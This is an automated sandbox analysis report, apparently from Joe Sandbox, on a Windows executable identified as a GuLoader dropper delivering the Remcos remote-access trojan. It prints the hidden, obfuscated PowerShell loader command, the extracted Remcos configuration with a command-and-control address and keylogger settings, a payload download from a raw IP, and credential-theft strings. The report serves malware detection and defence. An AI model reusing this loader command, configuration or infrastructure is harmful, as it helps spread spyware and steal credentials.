Windows Analysis Report
Uundgaaelige.exe

Overview

General Information

Sample name: Uundgaaelige.exe
Analysis ID: 1473335
MD5: fc55407cc82612103c5971dca1837d6b
SHA1: 01efa90009900c64c846b7ac716dea3c5f97c4e8
SHA256: c9736cdc4ade9fddb9b293e0366f182f972154d98169b58e532b7905c310bf97

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Uundgaaelige.exe (PID: 8196 cmdline: "C:\Users\user\Desktop\Uundgaaelige.exe" MD5: FC55407CC82612103C5971DCA1837D6B)
    • powershell.exe (PID: 8572 cmdline: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wab.exe (PID: 8740 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8944 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5328 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2236 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jsuqvvuvyrjcauafcmkobvuadfdgh" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uuzawnnwmzbhkjwjlxwhmaojmmvpaift" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7972 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mwrouticoypgwqnwbsfvbzcmbt" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1920 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1188 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wqwgumtekghlzwjakdzpeexukhhct" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4768 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ysczveexyozqjcxecnmqprrlsorluovz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3652 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rsjsvpyaezilg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8124 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\grwn" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 3648 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 4080 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gbhsgqnscotpcxmkxqfqyqcvmcvl" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • WerFault.exe (PID: 508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8740 -s 1424 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

{"Host:Port:Password": "172.93.222.25:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-P99HFC", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Source: C:\ProgramData\remcos\logs.dat, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security

Source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
Source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Author: Joe Security
(8 further entries not shown)

              System Summary

              Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 8740, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zygxucjbkjrxxomblbpmyjhjv", ProcessId: 8944, ProcessName: wab.exe
              Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8572, TargetFilename: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe
              Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales), CommandLine: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Uundgaaelige.exe", ParentImage: C:\Users\user\Desktop\Uundgaaelige.exe, ParentProcessId: 8196, ParentProcessName: Uundgaaelige.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Acrasiales=Get-Content 'C:\Users\user\AppData\Roaming\raffineredes\cerous\Chugging\Dialektologi.Alt';$Bodingly=$Acrasiales.SubString(40630,3);.$Bodingly($Acrasiales), ProcessId: 8572, ProcessName: powershell.exe

              Stealing of Sensitive Information

              Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 8740, TargetFilename: C:\ProgramData\remcos\logs.dat
              No Snort rule has matched


              AV Detection

              Source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "172.93.222.25:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-P99HFC", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: http://pesterbdd.com/images/Pester.png, Virustotal: Detection: 10%
              Source: http://pesterbdd.com/images/Pester.png4, Virustotal: Detection: 10%
              Source: http://geoplugin.net/json.gp, Virustotal: Detection: 7%
              Source: C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe, Virustotal: Detection: 13%
              Source: Uundgaaelige.exe, Virustotal: Detection: 13%
              Source: Yara match, File source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Uundgaaelige.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: Uundgaaelige.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: qm.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000007.00000002.216298003587.0000000008A9C000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Uundgaaelige.exe, Code function: 4_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405861
              Source: C:\Users\user\Desktop\Uundgaaelige.exe, Code function: 4_2_0040639C FindFirstFileA,FindClose,4_2_0040639C
              Source: C:\Users\user\Desktop\Uundgaaelige.exe, Code function: 4_2_004026F8 FindFirstFileA,4_2_004026F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exe, Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898

              Networking

              Source: Malware configuration extractor, URLs: 172.93.222.25
              Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
              Source: Joe Sandbox View, IP Address: 178.237.33.50
              Source: Joe Sandbox View, ASN Name: WOWUS
              Source: global traffic, HTTP traffic detected: GET /HMKcAbwpOCo117.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 209.90.237.48 Cache-Control: no-cache
              Source: unknown, TCP traffic detected without corresponding DNS query: 209.90.237.48
              Source: wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000C.00000003.216342776684.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216343943505.00000000031F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000C.00000003.216342776684.00000000031F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.216343943505.00000000031F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000F.00000002.216863019101.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.216861546047.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217168034841.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login0 equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000F.00000002.216863019101.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.216861546047.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000003.217168034841.00000000033B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login0 equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000F.00000002.216861880333.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.217168262032.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global traffic, DNS traffic detected: DNS query: geoplugin.net
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: powershell.exe, 00000007.00000002.216287356676.000000000302E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000007.00000002.216287356676.000000000302E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: wab.exe, 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C2A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.
              Source: Uundgaaelige.exe, Uundgaaelige.exe.7.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Uundgaaelige.exe, Uundgaaelige.exe.7.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhv7A81.tmp.15.dr, bhvF0DA.tmp.19.dr, bhvAF03.tmp.12.dr String found in binary or memory: http://ocsp.digicert.com0
              Source: powershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png4
              Source: powershell.exe, 00000007.00000002.216288846699.0000000004F21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
              Source: wab.exe, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000E.00000002.216328189876.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216849855991.000000000350D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217152613364.00000000034BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000012.00000002.216849181328.0000000002B7C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
              Source: wab.exe, 00000016.00000002.217151981558.0000000002BCC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/Pn
              Source: wab.exe, 0000000E.00000002.216327420797.000000000309C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/Xr=
              Source: wab.exe, 0000000E.00000002.216328189876.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.216849855991.000000000350D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.217152613364.00000000034BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000C.00000002.216343254639.00000000027E4000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862177214.0000000002A94000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168571301.0000000002B24000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 00000007.00000002.216288846699.0000000004F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
